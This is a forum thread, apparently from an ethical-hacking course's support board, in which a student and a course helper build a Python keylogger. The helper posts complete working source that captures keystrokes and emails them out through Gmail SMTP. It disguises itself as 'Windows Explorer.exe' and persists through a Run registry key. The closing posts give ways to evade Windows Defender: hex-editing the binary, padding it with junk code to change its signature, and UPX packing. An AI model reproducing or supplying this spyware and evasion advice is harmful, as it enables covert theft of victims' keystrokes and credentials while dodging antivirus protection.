Viewing 8 posts - 1 through 8 (of 8 total)
  • Author
    Posts
  • #26068
    Avataralisonsmith494
    Participant

    Hello Zaid,
    I follow the Keylogger and backdoor cause, you did not cover how to include Persistence in keylogger, i tried to do it by my self, which i follow the code you used in the backdoor and i got the following error below
    [email protected]:~/PycharmProjects/keylogger# python zlogger.py
    Traceback (most recent call last):
    File “zlogger.py”, line 4, in <module>
    my_keylogger = keylogger.Keylogger(120, “[email protected]”, “alexnuga2”)
    File “/root/PycharmProjects/keylogger/keylogger.py”, line 10, in __init__
    self.become_persistent()
    File “/root/PycharmProjects/keylogger/keylogger.py”, line 17, in become_persistent
    evil_file_location = os.environ[“appdata”] + “\\Windows Explorer.exe”
    NameError: global name ‘os’ is not defined

    Please put the thought with a shot video how to fix the Persistence in keylogger

    #26133
    AvatarAJ
    Participant

    Hi Alison,

    Sorry for the late reply. Can you show me the source code of the zlogger.py, so we can better debug the issue please?
    Thank you.

    #26139
    Avataralisonsmith494
    Participant

    Hello AJ,
    Below is the source code of the kelogger and and zlogger,

    Keylogger:

    #!/usr/bin/env python
    import pynput.keyboard
    import threading
    import smtplib

    class Keylogger:
    def __init__(self, time_interval, email, password):
    self.log = “Keylogger started”
    self.interval = time_interval
    self.email = email
    self.password = password

    def append_to_log(self, string):
    self.log = self.log + string

    def process_key_press(self, key):
    try:
    current_key = str(key.char)
    except AttributeError:
    if key == key.space:
    current_key = ” ”
    else:
    current_key = ” ” + str(key) + ” ”
    self.append_to_log(current_key)

    def report(self):
    self.send_mail(self.email, self.password, “\n\n” + self.log)
    self.log = “”
    timer = threading.Timer(self.interval, self.report)
    timer.start()

    def send_mail(self, email, password, message):
    server = smtplib.SMTP(“smtp.gmail.com”, 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()

    def start(self):
    keyboard_listener =pynput.keyboard.Listener(on_press=self.process_key_press)
    with keyboard_listener:
    self.report()
    keyboard_listener.join()

    ================
    Zlogger

    #!/usr/bin/env python
    import keylogger

    my_keylogger = keylogger.Keylogger(120, “[email protected]”, “alexnuga2”)
    my_keylogger.start()

    ========================================
    And i tried to use this code below to make the zlogger persistent in Window, but i keep on having error

    import shutill
    import sys

    self.become_persistent()

    def become_persistent(self):
    location = os.environ[“appdata”] + “\\windowsupdate.exe”
    if not os.path.exists(location):
    shutil.copyfile(sys.executable, location)
    subprocess.call(‘reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d “‘ + location + ‘”‘, shell=True)

    I will looking forward to hear from you with solution.

    Regards.

    #26237
    AvatarAJ
    Participant

    Hi Alison,

    I am sorry for the late reply. I actually managed to reproduce the same keylogger with persistence and it worked. Please check the following source code, and try to use it for later debugging or if you want to buildup on this:

    klog_object.py

    
    #!/usr/bin/env python
    import persistent_keylogger
    my_keylogger = persistent_keylogger.Keylogger(120, “[email protected]”, “alexnuga2”)
    my_keylogger.start()
    

    Actual code of persistence_keylogger.py

    
    #!/usr/bin/env python
    import pynput.keyboard
    import threading
    import smtplib
    import shutil
    import os
    import sys
    import subprocess
    
    class Keylogger:
    	def __init__(self, time_interval, email, password):
        	        self.log = "Keylogger started"
    		self.become_persistent()
    	        self.interval = time_interval
    	        self.email = email
    	        self.password = password
    
    	def become_persistent(self):
            	evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"
            	if not os.path.exists(evil_file_location):
                	    shutil.copyfile(sys.executable, evil_file_location)
    		    subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True)
    
    	def append_to_log(self, string):
    		self.log = self.log + string
    
    	def process_key_press(self, key):
    		try:
    			current_key = str(key.char)
    		except AttributeError:
    			if key == key.space:
    				current_key = " "
    			else:
    				current_key = " " + str(key) + " "
    		self.append_to_log(current_key)
    
    	def report(self):
    		self.send_mail(self.email, self.password, "\n\n" + self.log)
    		self.log = ""
    		timer = threading.Timer(self.interval, self.report)
    		timer.start()
    
    	def send_mail(self, email, password, message):
    		server = smtplib.SMTP("smtp.gmail.com", 587)
    		server.starttls()
    		server.login(email, password)
    		server.sendmail(email, email, message)
    		server.quit()
    
    	def start(self):
    		keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)
    		with keyboard_listener:
    			self.report()
    			keyboard_listener.join()
    

    Note: Please note that I’ve changed the names of the file and tested the keylogger with my Gmail even after the target system has been restarted, but I put your name again for convenience, and that you put the correct file names for I changed them when I edited the above source code.

    Please let me know how it goes. Thank you.

    #26257
    Avataralisonsmith494
    Participant

    Hi AJ,

    Thanks for your reply, the most important challenge now is how to bypass Windows Defender, My Klogger and Payload never get exexuted on window, Please i need help on how to bypass Windows Defender, i have tried all your evision but still get detected, Is there any crypter or way to bypass Defender…

    Thanks

    #26289
    AvatarAJ
    Participant

    Hi Alison,

    Please give some time, and I’ll get back to you asap. BTW, did the persistent feature worked for you?

    #26404
    Avataralisonsmith494
    Participant

    Hi AJ,

    Thanks for the response, yes the feature works, but the window 10 defender never allow me to try it, if there is a dropper to crypter to bypass defender i would appreciate it …

    Regards.

    #26437
    AvatarAJ
    Participant

    Hi Alison,

    You have several options to bypass Windows defender, so you can:

    1. Modify the backdoor executable after packaging using a hex editor, so you can use hexeditor <filename> that comes pre-installed in Kali, and try to modify some part of it, but please make sure that you don’t break the payload. Now Zaid does cover how to do this in the “Social Engineering” course, though you can check for more examples online to buildup on this as shown below:
    https://null-byte.wonderhowto.com/how-to/hack-your-game-saves-basic-guide-hex-editing-0132155/
    https://hackingandsecurity.blogspot.com/2016/03/fud-through-hex-editor-heading.html

    2. Add some random data like various printing functions, statements, and by including new variable names to make the backdoor looks more unique, thus increasing the chance of generating a unique signature that can bypass Windows Defender signatures DB. Now, this seems daunting, but this process is a trial and error process, so you have to try to edit the code without breaking it after you package the backdoor python source code of the “klog_object.py”. You can also install upx to enhance the backdoor exe when you test it on nodistribute.com from
    https://github.com/upx/upx/releases/

    Now, this is covered in section 15, in which you will learn how to bypass a reasonable number of AV if you follow the same procedure and the above notes and resources.

    Please let me know if you face any issues again. Thank you.

Viewing 8 posts - 1 through 8 (of 8 total)
  • You must be logged in to reply to this topic.